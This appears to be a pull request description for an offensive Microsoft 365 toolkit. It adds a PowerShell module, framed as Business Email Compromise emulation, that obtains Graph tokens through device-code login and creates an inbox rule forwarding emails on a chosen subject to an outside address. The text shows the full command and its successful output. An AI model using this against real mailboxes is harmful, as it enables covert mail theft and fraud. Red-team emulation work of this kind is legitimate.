[New Module] Invoke-CreateInboxForwardingRule

[HuskyHacks]

This adds a simple email inbox forwarding rule module to aid in the emulation of Business Email Compromise scenarios. This module authenticates with the Microsoft Teams client to retrieve a correctly scoped token, then calls the Graph API to create an email inbox forwarding rule. You can specify the rule term and the forwarding address. I built the module to mirror the other module's authentication flows and conventions so it should look pretty familiar.

PS> Invoke-CreateInboxForwardingRule -Tokens $tokens -EmailAddressName husky -RuleTerm salary -RuleName salary -EmailAddress [email protected] -UserId "[email protected]"

[*] First, you need to login.
[*] If you already have tokens you can use the -Tokens parameter to pass them to this function.
[*] Do you want to authenticate now (yes/no)?
yes
[*] Running Get-GraphTokens now...
To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code [CODE] to authenticate.
[*] Successful authentication. Access and refresh tokens have been written to the global $tokens variable. To use them with other GraphRunner modules use the Tokens flag (Example. Invoke-DumpApps -Tokens $tokens)
[!] Your access token is set to expire on: 07/09/2024 13:58:54
[*] Creating forwarding rule...
[*] Forwarding rule created successfully.


@odata.context : https://graph.microsoft.com/v1.0/$metadata#users('[USER ID])/mailFolders('inbox')/messageRules/$entity
id             : AQAAAIezxiY=
displayName    : salary
sequence       : 2
isEnabled      : True
hasError       : False
isReadOnly     : False
conditions     : @{subjectContains=System.Object[]}
actions        : @{stopProcessingRules=True; forwardTo=System.Object[]}

My plan is to expand this into more modules and also make the parameters more flexible so we can emulate more types of BEC inbox rule shenanigans, but I wanted to get this into the repo as an MVP.

See: #12